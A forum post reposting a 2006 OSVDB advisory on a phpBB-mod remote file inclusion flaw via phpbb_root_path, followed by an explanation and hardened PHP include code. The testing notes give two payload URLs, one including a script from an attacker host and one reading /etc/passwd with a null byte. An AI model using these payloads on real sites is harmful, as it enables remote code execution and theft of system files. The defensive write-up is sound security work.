*edited* 2.0.33 - functions_mod_user.php / phpbb_root_path Variable Remote File Inclusion

phpBB security.


Post by sabri ünal, 19.09.2006, 20:52

http://www.osvdb.org/displayvuln.php?osvdb_id=28140

*edited* an old vulnerability :)

*edited* functions_mod_user.php phpbb_root_path Variable Remote File Inclusion
OSVDB ID: 28140
Disclosure Date: Aug 24, 2006


Description:
*edited* contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'functions_mod_user.php' not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host or the local system of the target that contains arbitrary commands which will be executed by the vulnerable script.



Technical Description:
This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

This vulnerability can be exploited to include internal files local to the target system when the magic_quotes_gpc PHP option is 'off'.



Vulnerability Classification:
Remote/Network Access Required
Input Manipulation
Loss Of Integrity
Exploit Available
Web Related


Products:
*edited* *edited* 2.0.33



Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.



Manual Testing Notes:
http://[target]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=http://[attacker]/cmd.txt?
http://[target]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=/etc/passwd%00



External References:

Related OSVDB ID: 28141
Secunia Advisory ID: 21602
Vendor URL: http://www.*edited*.net/
Other Advisory URL: http://www.nukedx.com/?viewdoc=48
Mail List Post: http://archives.neohapsis.com/archives/ ... /0624.html


Credit:

Mustafa Can Bjorn


Vulnerability Status:
This entry was last updated on Aug 25, 2006. If you have additional information or corrections for this vulnerability please submit them to OSVDB Moderators.

Direct URL to this page: http://www.osvdb.org/28140
I'm happy, I'm doing a bit of comedy these days! Don't get mad, it will pass soon, I don't know the reason myself! I haven't found a new love either!
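The OSVDB entry quoted above describes a classic register_globals include bug: a library file that expects its front controller to have set `$phpbb_root_path` is requested directly, and PHP populates that variable from the query string. The block below is an added illustration, not the product's actual `functions_mod_user.php` (its real source is not on this page); the vulnerable pattern is a hypothetical minimal reconstruction of the class of bug the advisory describes, and the hardened form uses the `IN_PHPBB` guard that phpBB 2.0.x itself uses plus a `safe_include()` helper that is my own naming. Remote inclusion additionally requires `allow_url_fopen` (and, from PHP 5.2 on, `allow_url_include`) to be enabled on the target, which the advisory does not spell out.

```php
<?php
// ---- Vulnerable pattern (hypothetical reconstruction, not the vendor's code) ----
//
// With register_globals=On, a request such as
//     includes/functions_mod_user.php?phpbb_root_path=http://[attacker]/cmd.txt?
// makes PHP create the global $phpbb_root_path from the query string before the
// script runs, so an include like the following fetches and executes remote code:
//
//     include($phpbb_root_path . 'includes/constants.php');
//
// The trailing "?" in the payload turns the rest of the concatenated path into a
// query string of the attacker's URL, so the include still resolves.
//
// Local inclusion works the same way with a null byte:
//     ?phpbb_root_path=/etc/passwd%00
// The %00 truncates the path before 'includes/constants.php' is appended, but only
// when magic_quotes_gpc is Off; with it On the byte is escaped to "\0" and the
// include fails, which is exactly the caveat in the advisory's technical notes.
//
// With register_globals=Off (the PHP default since 4.2.0) the variable is simply
// undefined when the file is hit directly, and the include fails.

// ---- Hardened pattern ----

// 1. Refuse direct requests. phpBB 2 library files check for a constant that only
//    the front controller (index.php, admin/*.php, ...) defines.
if (!defined('IN_PHPBB')) {
    die('Hacking attempt');
}

// 2. Never let request data choose the include base. Derive the root from the
//    script's own location instead of trusting a global that may have been
//    imported from the query string.
$phpbb_root_path = dirname(__DIR__) . '/';

// 3. Canonicalise and check every path before including it, so that even a
//    leaked or overwritten $phpbb_root_path cannot escape the web root.
//    safe_include() is an added helper name, not a phpBB function.
function safe_include($root, $relative)
{
    $root_real = realpath($root);
    $target    = realpath($root . $relative);

    // realpath() returns false for URLs (http://...) and for paths containing
    // a NUL byte, which defeats both the RFI and the %00 LFI payloads above.
    if ($root_real === false || $target === false) {
        die('Invalid include path');
    }

    // Containment: the resolved target must sit strictly below the root.
    if (strpos($target, $root_real . DIRECTORY_SEPARATOR) !== 0) {
        die('Invalid include path');
    }

    // Only PHP sources are legitimate include targets; /etc/passwd never is.
    if (substr($target, -4) !== '.php') {
        die('Invalid include path');
    }

    return include $target;
}

// Usage in the library file, replacing the bare include shown above:
safe_include($phpbb_root_path, 'includes/constants.php');
```

Operationally, the two PHP settings the advisory names are the ones to verify on a suspect host: `php -i | grep -E 'register_globals|magic_quotes_gpc'` (or the same keys in `phpinfo()`). register_globals=On makes the script exploitable at all; magic_quotes_gpc=Off additionally enables the null-byte local include. Both settings have since been removed from PHP entirely (magic_quotes and register_globals went in 5.4), so the code-level guard above is the durable fix.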
